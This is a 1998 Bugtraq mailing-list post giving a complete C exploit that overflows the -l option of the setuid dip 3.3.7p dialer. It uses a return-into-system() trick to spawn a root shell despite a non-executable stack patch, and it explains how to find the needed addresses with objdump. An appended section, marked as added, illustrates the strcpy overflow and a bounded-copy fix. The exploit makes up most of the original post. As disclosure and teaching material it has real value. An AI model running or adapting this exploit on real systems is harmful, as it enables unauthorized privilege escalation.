Bugtraq mailing list archives
dip-3.3.7p exploit (stackpatch_
From: tstroege () CIP INFORMATIK UNI-ERLANGEN DE (Thomas Troeger)
Date: Fri, 26 Jun 1998 17:46:53 +0200
Hi,
While playing around with dip-3.3.7p I realized that the method I used in my
previous posting won't do. So I had a look at the source and developed a new
program. Here it goes:
------------------- sammeltonne.c -------------------
/*
 * Program to get a shell from dip-3.3.7p on a system with
 * Solar Designer's stackpatch installed.
 * by tstroege () cip informatik uni-erlangen de
 *
 * Of course this is just for educational purposes too :)
 */
#include <stdlib.h>     /* atoi */
#include <string.h>     /* strcpy */
#include <unistd.h>     /* execve */

#define SOMETEXT 0x0804cee5
/* address of text system call */
#define CMDSTR 0x08054f0e
/* address where command string should be */
#define DIP "/usr/sbin/dip"
/* path of dip */

int main(int argc, char *argv[]) {
    char mem[256], *ptr;
    /* dip is run with the oversized buffer as the argument of -l */
    char *name[] = { DIP, "-k", "-l", mem, (char *)0 };
    /* the two addresses are copied as raw bytes; strcpy stops at the
     * terminating 0 word, so neither may contain a zero byte */
    int i, code[] = { SOMETEXT, CMDSTR, 0 };
    int off = 117;          /* offset of the saved return address, adjustable */

    if (argc > 1) off = atoi(argv[1]);
    for (ptr = mem, i = 0; i < 256; i++) *ptr++ = 'a';   /* filler */
    ptr = mem + off;
    strcpy(ptr, (char *)&(code[0]));
    mem[255] = 0;
    execve(name[0], name, NULL);
    return 0;
}
-----------------------------------------------
SOMETEXT:
address in the text segment where system() is called.
CMDSTR:
address in the text segment where a suitable command string is stored
(dip is nice enough to have a /bin/sh string in its code).
Both addresses will be different on your system, so here is a way to
find them out:
...
objdump --disassemble-all /usr/sbin/dip
...
Now search for the following pattern:
...
0804ced4 pushl %ebx
0804ced5 pushl $0x8054848
0804ceda pushl $0x6
0804cedc call 08049678
0804cee1 addl $0xc,%esp
0804cee4 pushl %ebx
-->0804cee5 call 080493c8 SOMETEXT
0804ceea addl $0x4,%esp
0804ceed testl %eax,%eax
0804ceef jne 0804cf9e
0804cef5 pushl %esi
0804cef6 movl 0x8(%ebp),%eax
0804cef9 movl 0x660(%eax),%eax
0804ceff pushl %eax
...
0804eefd leal 0xfffffc00(%ebp),%eax
0804ef03 pushl %eax
0804ef04 pushl $0x8054f08
0804ef09 pushl $0x8054f0b
0804ef0e pushl $0x8054f0e<-- CMDSTR
0804ef13 call 08049368
0804ef18 pushl $0x7f
0804ef1a call 08049768
0804ef1f nop
...
tst.
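The post shows the exploit but not the defect in dip that makes it work. The following is an added illustration, not code from the original post or from dip itself: a hypothetical stand-in for the bug class (a fixed-size stack buffer filled from an argv string with strcpy, which is what a 256-byte -l argument overruns) beside a bounded version of the same operation. The function names copy_option_unchecked, copy_option_bounded, option_would_overflow and bounded_accepts_fill are assumptions; dip's real option handler is not shown on the page. The point for a defender is that the overwritten return address lands in dip's own text segment, so a non-executable stack is no fix; only the missing length check is.

```c
/*
 * Added illustration, not code from the original post or from dip.
 * Assumptions (hypothetical; dip's real handler is not shown in the post):
 *   copy_option_unchecked() - a fixed stack buffer filled from an argv
 *                             string with strcpy, the defect class
 *   copy_option_bounded()   - the same operation with a length check
 * OPTBUF (256) is taken from the size of the exploit's own argument.
 */
#include <stdio.h>
#include <string.h>

#define OPTBUF 256

/* The bug: nothing compares strlen(arg) against the buffer.  An argument
 * longer than OPTBUF runs past buf and overwrites the saved return address.
 * The exploit above points that address at a call to system() inside dip's
 * text segment, so Solar Designer's non-executable stack patch does not
 * apply: no instruction is ever executed from the stack.
 * Only call this with inputs that fit; a longer input is undefined. */
size_t copy_option_unchecked(const char *arg)
{
    char buf[OPTBUF];
    strcpy(buf, arg);               /* unbounded copy: the defect */
    return strlen(buf);
}

/* The fix: refuse anything that does not fit, terminator included.
 * Returns 0 on success, -1 if the argument is too long; never writes
 * beyond buf[OPTBUF - 1]. */
int copy_option_bounded(char buf[OPTBUF], const char *arg)
{
    size_t n = strlen(arg);
    if (n >= OPTBUF)
        return -1;                  /* would overflow: reject */
    memcpy(buf, arg, n + 1);        /* exact, bounded copy */
    return 0;
}

/* The check the vulnerable code was missing, as a reusable predicate. */
int option_would_overflow(const char *arg)
{
    return strlen(arg) >= OPTBUF;
}

/* Builds an argument in the exploit's style (n bytes of 'a', constructed
 * here, capped at 1023) and reports whether the bounded copy accepts it. */
int bounded_accepts_fill(size_t n)
{
    static char arg[1024];
    char buf[OPTBUF];
    if (n >= sizeof arg)
        n = sizeof arg - 1;
    memset(arg, 'a', n);
    arg[n] = '\0';
    return copy_option_bounded(buf, arg) == 0;
}

int main(int argc, char *argv[])
{
    char buf[OPTBUF];
    const char *arg = argc > 1 ? argv[1] : "ppp0";   /* constructed sample */

    if (copy_option_bounded(buf, arg) != 0) {
        fprintf(stderr, "argument too long (%zu bytes, limit %d)\n",
                strlen(arg), OPTBUF - 1);
        return 1;
    }
    printf("accepted: %s\n", buf);
    return 0;
}
```

Run with a short argument and it is accepted; run with 256 or more bytes and the bounded copy rejects it before anything is written. The unchecked variant is kept only to show the shape of the defect; the same bound applies to every fixed stack buffer fed from argv in a setuid program.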
